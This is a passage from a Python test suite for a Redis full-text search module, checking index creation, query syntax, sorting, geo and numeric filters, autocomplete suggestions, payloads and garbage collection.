'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo', 'desc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'desc')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'asc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withscores', 'limit', '2', '5')
env.assertEqual(
[100L, 'doc2', '0', 'doc3', '0', 'doc4', '0', 'doc5', '0', 'doc6', '0'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual(
[100L, 'doc0', '#100', 'doc1', '#99', 'doc2', '#98', 'doc3', '#97', 'doc4', '#96'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'foo', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual([100L, 'doc99', '$hello099 world', 'doc98', '$hello098 world', 'doc97', '$hello097 world', 'doc96',
'$hello096 world', 'doc95', '$hello095 world'], res)
def testNot(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
N = 10
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for i in range(5):
inclusive = r.execute_command(
'ft.search', 'idx', 'constant term%d' % i, 'nocontent', 'limit', 0, N)
exclusive = r.execute_command(
'ft.search', 'idx', 'constant -term%d' % i, 'nocontent', 'limit', 0, N)
exclusive2 = r.execute_command(
'ft.search', 'idx', '-(term%d)' % i, 'nocontent', 'limit', 0, N)
exclusive3 = r.execute_command(
'ft.search', 'idx', '(-term%d) (constant)' % i, 'nocontent', 'limit', 0, N)
env.assertNotEqual(inclusive[0], N)
env.assertEqual(inclusive[0] + exclusive[0], N)
env.assertEqual(exclusive3[0], exclusive2[0])
env.assertEqual(exclusive3[0], exclusive[0])
s1, s2, s3, s4 = set(inclusive[1:]), set(
exclusive[1:]), set(exclusive2[1:]), set(exclusive3[1:])
env.assertTrue(s1.difference(s2) == s1)
env.assertTrue(s1.difference(s3) == s1)
env.assertTrue(s1.difference(s4) == s1)
env.assertTrue(s2 == s3)
env.assertTrue(s2 == s4)
env.assertTrue(s2.intersection(s1) == set())
env.assertTrue(s3.intersection(s1) == set())
env.assertTrue(s4.intersection(s1) == set())
# NOT on a non existing term
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -dasdfasdf', 'nocontent')[0], N)
# not on env term
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -constant', 'nocontent'), [0])
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -(term0|term1|term2|term3|term4|nothing)', 'nocontent'), [0])
# env.assertEqual(r.execute_command('ft.search', 'idx', 'constant -(term1 term2)', 'nocontent')[0], N)
def testNestedIntersection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'a', 'text', 'b', 'text', 'c', 'text', 'd', 'text'))
for i in range(20):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'a', 'foo', 'b', 'bar', 'c', 'baz', 'd', 'gaz'))
res = [
r.execute_command('ft.search', 'idx',
'foo bar baz gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@a:foo @b:bar @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@b:bar @a:foo @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@c:baz @b:bar @a:foo @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@d:gaz @c:baz @b:bar @a:foo', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@a:foo (@b:bar (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@c:baz (@a:foo (@b:bar (@c:baz @d:gaz)))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@b:bar (@a:foo (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@d:gaz (@a:foo (@c:baz @b:bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar baz gaz)', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (baz gaz))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (foo bar) (foo bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (foo (bar baz (gaz)))', 'nocontent'),
r.execute_command('ft.search', 'idx', 'foo (foo (bar (baz (gaz (foo bar (gaz))))))', 'nocontent')]
for i, r in enumerate(res):
# print i, res[0], r
env.assertListEqual(res[0], r)
def testInKeys(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
for i in range(200):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world'))
for _ in r.retry_with_rdb_reload():
for keys in (
['doc%d' % i for i in range(10)], ['doc%d' % i for i in range(0, 30, 2)], [
'doc%d' % i for i in range(99, 0, -5)]
):
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', len(keys), *keys)
env.assertEqual(len(keys), res[0])
env.assertTrue(all((k in res for k in keys)))
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', 3, 'foo', 'bar', 'baz')[0])
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', 99)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', -1)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'inkeys', 4, 'foo')
def testSlopInOrder(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 't1 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1, 'fields',
'title', 't1 t3 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3', 1, 'fields',
'title', 't1 t3 t4 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc4', 1, 'fields',
'title', 't1 t3 t4 t5 t2'))
res = r.execute_command(
'ft.search', 'idx', 't1|t4 t3|t2', 'slop', '0', 'inorder', 'nocontent')
env.assertEqual({'doc3', 'doc4', 'doc2', 'doc1'}, set(res[1:]))
res = r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'inorder')[0])
env.assertEqual(1, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '0', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '1', 'inorder')[0])
env.assertEqual(3, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '2', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '3', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'inorder')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't t1', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4', 'inorder')[0])
def testExact(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
res = r.execute_command(
'ft.search', 'idx', '"hello world"', 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', "hello \"another world\"", 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testGeo(env):
r = env
gsearch = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', query, 'geofilter', 'location', lon, lat, dist, unit)
gsearch_inline = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', '{} @location:[{} {} {} {}]'.format(query, lon, lat, dist, unit))
env.assertOk(r.execute_command('ft.create', 'idx',
'schema', 'name', 'text', 'location', 'geo'))
for i, hotel in enumerate(hotels):
env.assertOk(r.execute_command('ft.add', 'idx', 'hotel{}'.format(i), 1.0, 'fields', 'name',
hotel[0], 'location', '{},{}'.format(hotel[2], hotel[1])))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hilton')
env.assertEqual(len(hotels), res[0])
res = gsearch('hilton', "-0.1757", "51.5156", '1')
print res
env.assertEqual(3, res[0])
env.assertEqual('hotel2', res[5])
env.assertEqual('hotel21', res[3])
env.assertEqual('hotel79', res[1])
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '1')
env.assertListEqual(res, res2)
res = gsearch('hilton', "-0.1757", "51.5156", '10')
env.assertEqual(14, res[0])
env.assertEqual('hotel93', res[1])
env.assertEqual('hotel92', res[3])
env.assertEqual('hotel79', res[5])
res2 = gsearch('hilton', "-0.1757", "51.5156", '10000', 'm')
env.assertListEqual(res, res2)
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '10')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'm')
env.assertEqual(1, res[0])
env.assertEqual('hotel94', res[1])
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'm')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'km')
env.assertEqual(5, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'km')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '5', 'km')
env.assertEqual(3, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '5', 'km')
env.assertListEqual(res, res2)
def testGeoDeletion(env):
if env.is_cluster():
raise unittest.SkipTest()
# Can't properly test if deleted on cluster
env.cmd('ft.create', 'idx', 'schema',
'g1', 'geo', 'g2', 'geo', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
# keys are: "geo:idx/g1" and "geo:idx/g2"
env.assertEqual(2, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(2, env.cmd('zcard', 'geo:idx/g2'))
# Remove the first doc
env.cmd('ft.del', 'idx', 'doc1')
env.assertEqual(1, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(1, env.cmd('zcard', 'geo:idx/g2'))
# Replace the other one:
env.cmd('ft.add', 'idx', 'doc2', 1.0,
'replace', 'fields',
't1', 'just text here')
env.assertEqual(0, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(0, env.cmd('zcard', 'geo:idx/g2'))
def testAddHash(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command('ft.create', 'idx', 'schema',
'title', 'text', 'weight', 10.0, 'body', 'text', 'price', 'numeric'))
env.assertTrue(
r.hmset('doc1', {"title": "hello world", "body": "lorem ipsum", "price": 2}))
env.assertTrue(
r.hmset('doc2', {"title": "hello werld", "body": "lorem ipsum", "price": 5}))
env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc1', 1.0))
env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc2', 1.0))
res = r.execute_command('ft.search', 'idx', "hello", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc1", res[2])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx',
"hello",
"filter", "price", "0", "3"
)
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
env.assertListEqual(
['body', 'lorem ipsum', 'price', '2', 'title', 'hello world'], res[2])
res = r.execute_command(
'ft.search', 'idx', "hello werld", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testInfields(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text', 'weight', 1.0))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello world lorem ipsum',
'body', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', 'hello', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"hello world\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"lorem ipsum\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', "infields", 2, "body", "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
def testScorerSelection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
# this is the default scorer
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'TFIDF')
env.assertEqual(res, [0])
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'NOSUCHSCORER')
def testFieldSelectors(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'TiTle', 'text', 'BoDy', 'text', "יוניקוד", 'text', 'field.with,punct', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 'hello world', 'body', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 0.5, 'fields',
'body', 'hello world', 'title', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
res = r.execute_command(
'ft.search', 'idx', '@title:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc1'])
res = r.execute_command(
'ft.search', 'idx', '@body:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body:hello @title:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@body:hello world @title:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:(hello|foo) @Title:(world|bar)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body:(hello|foo world|bar)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body|title:(hello world)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@יוניקוד:(unicode)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@field\\.with\\,punct:(punt)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
def testStemming(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello kitties'))
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "verbatim")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
# test for unknown language
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "language", "foofoofian")
def testExpander(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
res = r.execute_command(
'ft.search', 'idx', 'kitties',
"nocontent",
"expander", "SBSTEM"
)
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitties', "nocontent", "expander", "noexpander")
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent", 'verbatim')
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
# Calling a stem directly works even with VERBATIM.
# You need to use the + prefix escaped
res = r.execute_command(
'ft.search', 'idx', '\\+kitti', "nocontent", 'verbatim')
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
def testNumericRange(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'score', 'numeric', 'price', 'numeric'))
for i in xrange(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'fields',
'title', 'hello kitty', 'score', i, 'price', 100 + 10 * i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 100)
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 50)
env.assertEqual(51, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', 'verbatim', "nocontent", "limit", 0, 100,
"filter", "score", "(0", "(50")
env.assertEqual(49, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", "-inf", "+inf")
env.assertEqual(100, res[0])
# test multi filters
scrange = (19, 90)
prrange = (290, 385)
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", scrange[
0], scrange[1],
"filter", "price", prrange[0], prrange[1])
# print res
for doc in res[2::2]:
sc = int(doc[doc.index('score') + 1])
pr = int(doc[doc.index('price') + 1])
env.assertTrue(sc >= scrange[0] and sc <= scrange[1])
env.assertGreaterEqual(pr, prrange[0])
env.assertLessEqual(pr, prrange[1])
env.assertEqual(10, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", "19", "90",
"filter", "price", "90", "185")
env.assertEqual(0, res[0])
# Test numeric ranges as part of query syntax
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 100]', "nocontent")
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 50]', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', '@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty -@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[-inf +inf]', "nocontent")
env.assertEqual(100, res[0])
def testSuggestions(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1))
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'INCR'))
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertEqual(1, len(res))
env.assertEqual("hello world", res[0])
terms = ["hello werld", "hallo world",
"yellow world", "wazzup", "herp", "derp"]
sz = 2
for term in terms:
env.assertEqual(sz, r.execute_command(
'ft.SUGADD', 'ac', term, sz - 1))
sz += 1
for _ in r.retry_with_rdb_reload():
env.assertEqual(7, r.execute_command('ft.SUGLEN', 'ac'))
# search not fuzzy
env.assertEqual(["hello world", "hello werld"],
r.execute_command("ft.SUGGET", "ac", "hello"))
# print r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1", "WITHSCORES")
# search fuzzy - shuold yield more results
env.assertEqual(['hello world', 'hello werld', 'yellow world', 'hallo world'],
r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY"))
# search fuzzy with limit of 1
env.assertEqual(['hello world'],
r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1"))
# scores should return on WITHSCORES
rc = r.execute_command(
"ft.SUGGET", "ac", "hello", "WITHSCORES")
env.assertEqual(4, len(rc))
env.assertTrue(float(rc[1]) > 0)
env.assertTrue(float(rc[3]) > 0)
rc = r.execute_command("ft.SUGDEL", "ac", "hello world")
env.assertEqual(1L, rc)
rc = r.execute_command("ft.SUGDEL", "ac", "world")
env.assertEqual(0L, rc)
rc = r.execute_command("ft.SUGGET", "ac", "hello")
env.assertEqual(['hello werld'], rc)
def testSuggestPayload(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'PAYLOAD', 'foo'))
env.assertEqual(2, r.execute_command(
'ft.SUGADD', 'ac', 'hello werld', 1, 'PAYLOAD', 'bar'))
env.assertEqual(3, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload', 1, 'PAYLOAD', ''))
env.assertEqual(4, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload2', 1))
res = r.execute_command("FT.SUGGET", "ac", "hello", 'WITHPAYLOADS')
env.assertListEqual(['hello world', 'foo', 'hello werld', 'bar', 'hello nopayload', None, 'hello nopayload2', None],
res)
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertListEqual(['hello world', 'hello werld', 'hello nopayload', 'hello nopayload2'],
res)
res = r.execute_command(
"FT.SUGGET", "ac", "hello", 'WITHPAYLOADS', 'WITHSCORES')
# we don't compare the scores beause they may change
env.assertEqual(12, len(res))
def testPayload(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(10):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1.0,
'payload', 'payload %d' % i,
'fields', 'f', 'hello world'))
for x in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(21, len(res))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'withpayloads')
env.assertEqual(31, len(res))
env.assertEqual(10, res[0])
for i in range(1, 30, 3):
env.assertEqual(res[i + 1], 'payload %s' % res[i])
def testGarbageCollector(env):
env.skipOnCluster()
if env.moduleArgs is not None and 'GC_POLICY FORK' in env.moduleArgs:
# this test is not relevent for fork gc cause its not cleaning the last block
raise unittest.SkipTest()
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0,
'fields', 'foo', ' '.join(('term%d' % random.randrange(0, 10) for i in range(10)))))
def get_stats(r):
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
gc_stats = {d['gc_stats'][x]: float(
d['gc_stats'][x + 1]) for x in range(0, len(d['gc_stats']), 2)}
d['gc_stats'] = gc_stats
return d
stats = get_stats(r)
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 8)
env.assertEqual(0, stats['gc_stats']['bytes_collected'])
env.assertGreater(int(stats['num_records']), 0)
initialIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
for i in range(N):
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in range(100):
# gc is random so we need to do it long enough times for it to work
env.cmd('ft.debug', 'GC_FORCEINVOKE', 'idx')
stats = get_stats(r)
env.assertEqual(0, int(stats['num_docs']))
env.assertEqual(0, int(stats['num_records']))
if not env.is_cluster():
env.assertEqual(100, int(stats['max_doc_id']))
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 30)
currentIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
# print initialIndexSize, currentIndexSize,
# stats['gc_stats']['bytes_collected']
env.assertGreater(initialIndexSize, currentIndexSize)
env.assertGreater(stats['gc_stats'][
'bytes_collected'], currentIndexSize)
for i in range(10):
res = r.execute_command('ft.search', 'idx', 'term%d' % i)
env.assertEqual([0], res)
def testReturning(env):
env.assertCmdOk('ft.create', 'idx', 'schema',
'f1', 'text',
'f2', 'text',
'n1', 'numeric', 'sortable',
'f3', 'text')
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'DOC_{0}'.format(i), 1.0, 'fields',
'f2', 'val2', 'f1', 'val1', 'f3', 'val3',
'n1', i)
# RETURN 0. Simplest case
for x in env.retry_with_reload():
res = env.cmd('ft.search', 'idx', 'val*', 'return', '0')
env.assertEqual(11, len(res))
env.assertEqual(10, res[0])
for r in res[1:]:
env.assertTrue(r.startswith('DOC_'))
for field in ('f1', 'f2', 'f3', 'n1'):
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, field)
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
for pair in grouper(res[1:], 2):
docname, fields = pair
env.assertEqual(2, len(fields))
env.assertEqual(field, fields[0])
env.assertTrue(docname.startswith('DOC_'))
# Test that we don't return SORTBY fields if they weren't specified
# also in RETURN
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'f1',
'sortby', 'n1', 'ASC')
row = res[2]
# get the first result
env.assertEqual(['f1', 'val1'], row)
# Test when field is not found
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'nonexist')
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
# # Test that we don't crash if we're given the wrong number of fields
with env.assertResponseError():
res = env.cmd('ft.search', 'idx', 'val*', 'return', 700, 'nonexist')
def _test_create_options_real(env, *options):
options = [x for x in options if x]
has_offsets = 'NOOFFSETS' not in options
has_fields = 'NOFIELDS' not in options
has_freqs = 'NOFREQS' not in options
try:
env.cmd('ft.drop', 'idx')
except:
pass
options = ['idx'] + options + ['schema', 'f1', 'text', 'f2', 'text']
env.assertCmdOk('ft.create', *options)
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'doc{}'.format(
i), 0.5, 'fields', 'f1', 'value for {}'.format(i))
# Query
# res = env.cmd('ft.search', 'idx', "value for 3")
# if not has_offsets:
# env.assertIsNone(res)
# else:
# env.assertIsNotNone(res)
# Frequencies:
env.assertCmdOk('ft.add', 'idx', 'doc100',
1.0, 'fields', 'f1', 'foo bar')
env.assertCmdOk('ft.add', 'idx', 'doc200', 1.0,
'fields', 'f1', ('foo ' * 10) + ' bar')
res = env.cmd('ft.search', 'idx', 'foo')
env.assertEqual(2, res[0])
if has_offsets:
docname = res[1]
if has_freqs:
env.assertEqual('doc200', docname)
else:
env.assertEqual('doc100', docname)
env.assertCmdOk('ft.add', 'idx', 'doc300',
1.0, 'fields', 'f1', 'Hello')
res = env.cmd('ft.search', 'idx', '@f2:Hello')
if has_fields:
env.assertEqual(1, len(res))
else:
env.assertEqual(3, len(res))
def testCreationOptions(env):
from itertools import combinations
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
_test_create_options_real(env, *combo)
def testInfoCommand(env):
from itertools import combinations
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'NOFIELDS', 'schema', 'title', 'text'))
N = 50
for i in xrange(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'replace', 'fields',
'title', 'hello term%d' % i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['index_name'], 'idx')
env.assertEqual(d['index_options'], ['NOFIELDS'])
env.assertListEqual(
